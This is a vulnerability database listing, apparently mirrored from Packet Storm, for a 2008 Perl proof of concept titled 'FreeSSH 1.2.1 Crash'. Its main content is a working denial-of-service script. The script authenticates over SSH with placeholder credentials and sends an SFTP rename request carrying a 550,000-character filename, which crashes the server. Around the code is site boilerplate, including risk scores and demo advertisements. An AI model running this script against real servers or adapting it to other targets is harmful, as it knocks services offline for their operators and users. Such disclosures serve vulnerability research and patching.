Lucene search

K

fsshatter.txt

๐Ÿ—“๏ธย 22 Oct 2008ย 00:00:00Reported byย Jeremy BrownTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 20ย Views

FreeSSH 1.2.1 Crash due to Fuzzing in Perl scrip

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]  
# FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned.  
use Net::SSH2;  
  
$host = "192.168.0.187";  
$port = 22;  
$username = "test";  
$password = "test";  
$dos = "A" x 550000;  
  
$ssh2 = Net::SSH2->new();  
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";  
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";  
$sftp = $ssh2->sftp();  
$rename = $sftp->rename($dos, "test");  
$ssh2->disconnect();  
exit;  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Oct 2008 00:00Current
0.1Low risk
Vulners AI Score0.1
20
.json
Report